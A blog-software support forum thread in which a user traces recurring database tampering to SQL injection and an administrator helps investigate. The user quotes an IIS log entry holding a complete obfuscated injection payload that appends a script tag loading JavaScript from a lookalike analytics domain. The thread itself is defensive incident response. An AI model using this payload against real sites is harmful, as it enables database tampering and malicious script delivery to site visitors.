|
Author |
Messages |
encikacop
Posts
:
2
Location
:
N/A
|
Hi guys,
Im new here. I found out our blog is having error when accessing. Deeper investigation lead to find malicious code inside table PTConfig in mssql 2005 database. Refer picture:
Any idea how it happen or how to prevent?
FYI, the database server is in another server which is very secure and cannot be access from outside. Only the webserver have connection to the database server. Means there is no way 'injector' can directly access to the mssql server. They must injecting from the blog.
Any advice and reply is highly appreciated.
|
|
|
Presstopia
Administrator
Posts
:
431
Location
:
Toronto, Canada
|
If you have access to your IIS logs, do a search for "PTConfig". If it was SQL injection there might be a reference in there somewhere which would give an idea which page was used to inject the code.
Having said that, and putting on my CSI hat for a sec ... the added code is pretty harmless (even though it will cause errors because numerics are now alphanumeric, etc.) which leads me to believe that it may have been added through another mechanism. If someone was injecting code they'd probably be injecting something more useful than the Google Analytics JS file load code. Any chance that someone within your organization may have run an update through Management Studio and accidently messed up the PTConfig table?
|
|
|
encikacop
Posts
:
2
Location
:
N/A
|
I dont think so because the database server is not directly connected to outside. No one can access it except the web server. The injection code is not Google Analytics code because the domain is a fake domain (which similar to Google Analytics URL). Please double-check on the domain name. The injection code happened everyday and we need to remove the line manually one by one.
When i search into the IIS logs file, i found a suspicious URL which is:
GET /pt/blog/default.aspx tag=E1'+update+PTconfig+set+cfg_Value=cast(cfg_Value+as+varchar(8000))%2Bcast(char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(39)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(39)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--
It seems like the blog can easily being injected with some code shown above. So what should we do? Is this our problem or presstopia problem?
|
|
|
Presstopia
Administrator
Posts
:
431
Location
:
Toronto, Canada
|
That log file entry is definitely suspicious. The good news is that we at least know how the code is injected.
What's interesting is that the injection happens via a querystring variable called "tag", as in "tag=E1" etc. Presstopia Blog doesn't actually support that querystring variable. Has your copy of Presstopia Blog been modified at all?
|
|
|